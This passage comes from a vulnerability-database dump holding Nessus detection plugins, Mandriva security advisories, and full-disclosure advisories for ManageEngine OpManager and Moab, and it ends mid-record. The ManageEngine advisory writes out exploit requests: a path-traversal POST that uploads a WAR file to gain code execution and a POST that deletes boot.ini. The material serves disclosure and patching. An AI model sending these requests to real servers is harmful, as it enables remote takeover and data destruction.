eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"zarafa-7.1.10-4.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:56:54", "references": ["https://packages.debian.org/source/wheezy/mantis", "http://www.debian.org/security/2014/dsa-3030"], "pluginID": "77763", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis bug tracking system.", "edition": 4, "reporter": "Tenable", "published": "2014-09-22T00:00:00", "title": "Debian DSA-3030-1 : mantis - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2015-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mantis", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3030.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3030. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77763);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/02/16 15:48:48 $\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_bugtraq_id(65445, 65461);\n script_xref(name:\"DSA\", value:\"3030\");\n\n script_name(english:\"Debian DSA-3030-1 : mantis - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple SQL injection vulnerabilities have been discovered in the\nMantis bug tracking system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mantis\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-3030\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mantis packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.2.11-1.2+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mantis\", reference:\"1.2.11-1.2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:38:07", "references": ["http://www.nessus.org/u?5f5d9195", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php"], "pluginID": "76177", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in recent/favorite tables navigation.\n\nWhen marking a crafted database or table name as favorite or having it in recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding feature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.", "edition": 4, "reporter": "Tenable", "published": "2014-06-23T00:00:00", "title": "FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-06-26T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpMyAdmin"], "id": "FREEBSD_PKG_C4892644F8C611E39F456805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76177", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2014 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76177);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2014/06/26 11:21:53 $\");\n\n script_cve_id(\"CVE-2014-4348\", \"CVE-2014-4349\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in recent/favorite tables\nnavigation.\n\nWhen marking a crafted database or table name as favorite or having it\nin recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding\nfeature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is\npossible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\"\n );\n # http://www.freebsd.org/ports/portaudit/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5f5d9195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.1.0<4.2.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:182\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : zarafa\r\n Date : September 24, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated zarafa packages fix security vulnerabilities:\r\n \r\n Robert Scheck reported that Zarafa's WebAccess stored session\r\n information, including login credentials, on-disk in PHP session\r\n files. This session file would contain a user's username and password\r\n to the Zarafa IMAP server (CVE-2014-0103).\r\n \r\n Robert Scheck discovered that the Zarafa Collaboration Platform has\r\n multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\r\n CVE-2014-5449, CVE-2014-5450).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0103\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5448\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5449\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5450\r\n http://advisories.mageia.org/MGASA-2014-0380.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n b574e9d3829a2083e0ab6f18f0c03d6e mbs1/x86_64/lib64zarafa0-7.1.8-1.1.mbs1.x86_64.rpm\r\n 3428bccf076a0415a5fcd3a8711d954c mbs1/x86_64/lib64zarafa-devel-7.1.8-1.1.mbs1.x86_64.rpm\r\n 3008870b6138647ece3e000f36b6e964 mbs1/x86_64/php-mapi-7.1.8-1.1.mbs1.x86_64.rpm\r\n e40348366d018a89a729ee4301c957c4 mbs1/x86_64/python-MAPI-7.1.8-1.1.mbs1.x86_64.rpm\r\n 48d737652190a274fabdcf2f6d2718ff mbs1/x86_64/zarafa-7.1.8-1.1.mbs1.x86_64.rpm\r\n 6e19f61e06ea0636e60457557217780e mbs1/x86_64/zarafa-archiver-7.1.8-1.1.mbs1.x86_64.rpm\r\n dd43d8a343ca593d19c38bfd99b4a933 mbs1/x86_64/zarafa-caldav-7.1.8-1.1.mbs1.x86_64.rpm\r\n 07caaec38f12734fa485ec5ac58108f2 mbs1/x86_64/zarafa-client-7.1.8-1.1.mbs1.x86_64.rpm\r\n 8201924f8a2021a34bf74ccfd6ec576f mbs1/x86_64/zarafa-common-7.1.8-1.1.mbs1.x86_64.rpm\r\n 066260bb283e280e1d2674047816b30b mbs1/x86_64/zarafa-dagent-7.1.8-1.1.mbs1.x86_64.rpm\r\n e583d4796a6d98723b4f18bca47744b3 mbs1/x86_64/zarafa-gateway-7.1.8-1.1.mbs1.x86_64.rpm\r\n 8b41c886437edce1eb583b91a43971f8 mbs1/x86_64/zarafa-ical-7.1.8-1.1.mbs1.x86_64.rpm\r\n 1347c9d77b5ea8a72ddc13cb94ddb3c1 mbs1/x86_64/zarafa-indexer-7.1.8-1.1.mbs1.x86_64.rpm\r\n 581ffb74503a3303782a10935ccc27e0 mbs1/x86_64/zarafa-monitor-7.1.8-1.1.mbs1.x86_64.rpm\r\n ee7a4afd5c4d9a13bc63922555c507e7 mbs1/x86_64/zarafa-server-7.1.8-1.1.mbs1.x86_64.rpm\r\n 415c6fac59aff2dbfbe61087242d1aa6 mbs1/x86_64/zarafa-spooler-7.1.8-1.1.mbs1.x86_64.rpm\r\n 1c3d37d1beea23d73b84fd76bce47fdc mbs1/x86_64/zarafa-utils-7.1.8-1.1.mbs1.x86_64.rpm\r\n d31a060121669abda9d720f4991094bf mbs1/x86_64/zarafa-webaccess-7.1.8-1.1.mbs1.noarch.rpm \r\n 00d2043f190032f6a624e0721d29242f mbs1/SRPMS/zarafa-7.1.8-1.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUIs4hmqjQ0CJFipgRAvRCAJ4wDpxAVuBlFOSSzqskGMG6pKHOzACcDNzl\r\n52oiDTAmeLxW4yTgFVIANrM=\r\n=/D7b\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:182 ] zarafa", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5450", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31201", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31201", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:143\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : July 30, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in\r\n phpmyadmin:\r\n \r\n Cross-site scripting (XSS) vulnerability in the\r\n PMA_getHtmlForActionLinks function in libraries/structure.lib.php in\r\n phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\r\n inject arbitrary web script or HTML via a crafted table comment that\r\n is improperly handled during construction of a database structure page\r\n (CVE-2014-4954).\r\n \r\n Cross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\r\n function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\r\n 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\r\n authenticated users to inject arbitrary web script or HTML via a\r\n crafted trigger name that is improperly handled on the database\r\n triggers page (CVE-2014-4955).\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js\r\n in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\r\n before 4.2.6 allow remote authenticated users to inject arbitrary web\r\n script or HTML via a crafted (1) table name or (2) column name that is\r\n improperly handled during construction of an AJAX confirmation message\r\n (CVE-2014-4986).\r\n \r\n server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\r\n before 4.2.6 allows remote authenticated users to bypass intended\r\n access restrictions and read the MySQL user list via a viewUsers\r\n request (CVE-2014-4987).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.6) to address\r\n these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4954\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4955\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4986\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4987\r\n http://sourceforge.net/p/phpmyadmin/news/\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n c38d242b5ef43c67383c413ee264c7ee mbs1/x86_64/phpmyadmin-4.2.6-1.mbs1.noarch.rpm \r\n 791e5933c8a096bfff2afa12bf3cd6a5 mbs1/SRPMS/phpmyadmin-4.2.6-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFT2LsEmqjQ0CJFipgRAuZEAJ9i3hrsGpz9nUuG3Cb1kdOrx5nU1gCg2z8e\r\n8mLBij7tNkEf/x0VnnkTFGo=\r\n=tSKY\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:143 ] phpmyadmin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31182", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-10-14T00:00:00", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:54", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31197", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "references": [], "description": "\r\n\r\n##[Moab User Impersonation : CVE-2014-5375]##\r\n\r\nSoftware: Moab\r\nAffected Versions: All current versions of Moab. However, the impact is limited in Moab 7.2.9 and Moab 8.\r\nCVE Reference: CVE-2014-5375\r\nAuthor: John Fitzpatrick, Luke Jennings MWR Labs (http://labs.mwrinfosecurity.com/)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Updates in Moab 7.2.9 and Moab 8 provide some mitigations\r\n\r\n\r\n##[Description]\r\n\r\nIt is possible to submit jobs to Moab as arbitrary users due to insufficient authentication checks during the submission of a job to the Moab server.\r\n\r\n\r\n##[Impact]\r\nUsers are able to submit jobs as arbitrary users. In environments that permit it this could allow job execution as root. \r\n\r\n\r\n##[Cause]\r\n\r\nMoab does not sufficiently validate the job submissions against its intended user ID values.\r\n\r\n\r\n##[Solution]\r\n\r\nAn upgrade to Moab 7.2.9 or Moab 8 prevents direct exploitation of this issue (further details are provided in the “Technical Details” section below). In these versions jobs submitted in this manner enter a held state, this is flagged as a known issue by Adaptive (MOAB-7478):\r\n\r\n"Jobs submitted with invalid credentials are put in a held state, instead of rejected, until the administrator can respond. The checkjob command gives administrators further information regarding why the job is held. Blindly assuming that all held jobs should in fact be running RIGHT NOW is not only unsafe, but circumvents intentional Moab policies and workflow. An administrator should exercise care when resolving held jobs".\r\n\r\nAdministrators should be aware that attackers can control the <UserID> value which provides them control over the user specified within the checkjob. MWR would recommend that Adaptive make use of the “actor” value passed to Moab, as the controls introduced in 7.2.9 and 8 prevent manipulation of this value. \r\n\r\n\r\n##[Technical Details]\r\n\r\nMoab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. Moab communication makes use of an XML based protocol. An example message showing a job submission is shown below:\r\n\r\n<Envelope component="ClusterScheduler" count="1" name="moab" type="nonblocking" version="8.0.beta.2">\r\n <Signature>\r\n <DigestValue>7v49VzAlbyNQ4O3VChCus+v2LeE=</DigestValue>\r\n <SignatureValue>QG13cmxhYnMgRWFzdGVyIEVnZyE=</SignatureValue>\r\n </Signature>\r\n <Body actor="test" timestamp="1408488412">\r\n <Request action="submit" actor="test" cmdline="\STARTmsub">\r\n <Object>job</Object>\r\n <job>\r\n <Owner>test</Owner>\r\n <UserId>test</UserId>\r\n <GroupId>test</GroupId>\r\n <InitialWorkingDirectory>/home/test</InitialWorkingDirectory>\r\n <UMask>2</UMask>\r\n 